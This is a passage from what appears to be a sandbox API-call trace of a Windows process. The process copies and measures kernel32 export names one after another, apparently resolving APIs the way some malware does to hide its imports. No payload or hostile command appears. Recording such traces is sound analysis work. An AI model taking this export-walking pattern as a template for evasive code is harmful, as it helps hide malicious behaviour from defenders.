| out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.469] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.469] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.469] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.469] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.469] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.469] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.469] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.469] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.469] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.469] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.469] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.469] lstrlenA (lpString="CANCELIO") returned 8 [0079.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.469] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.469] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.469] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.469] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.469] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.469] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.470] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.470] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.470] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.470] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.470] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.470] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.470] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.470] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.470] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.470] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.470] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.470] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.470] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.470] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.470] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.470] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.470] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.470] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.471] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.471] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.471] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.471] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.471] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.471] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.471] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.471] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.471] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.471] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.471] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.471] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.471] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.471] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.471] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.471] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.471] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.471] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.471] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.472] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.472] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.472] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.472] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.472] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.472] lstrlenA (lpString="COPYFILEA") returned 9 [0079.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.472] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.472] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.472] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.472] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.472] lstrlenA (lpString="COPYFILEW") returned 9 [0079.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.472] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.472] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.472] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.472] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.472] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.472] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.472] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.472] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.473] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.473] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.473] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.473] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.473] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.473] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.473] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.473] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.473] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.473] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.473] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.473] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.473] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.473] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.473] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.473] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.473] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.473] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.473] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.473] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.473] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.473] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.473] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.473] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.473] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.473] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.473] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.473] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.473] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.473] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.473] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.473] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.473] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.473] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.473] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.473] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.474] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.474] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.474] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.474] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.474] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.474] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.474] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.474] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.474] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.474] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.474] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.474] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.474] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.474] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.474] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.474] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.474] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.474] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.474] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.474] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.474] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.474] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.474] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.474] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.474] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.474] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.474] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.474] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.474] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.474] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.474] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.474] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.474] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.474] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.474] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.474] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.475] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.475] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.475] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.475] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.475] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.475] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.475] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.475] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.475] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.475] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.475] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.475] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.475] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.475] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.475] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.475] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.475] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.475] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.475] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.475] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.475] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.475] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.475] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.475] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.475] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.475] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.475] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.475] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.475] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.475] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.475] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.475] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.475] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.475] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.475] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.476] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.476] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.476] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.476] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.476] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.476] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.476] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.476] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.476] lstrlenA (lpString="CREATETHREADPOOL") returned 16 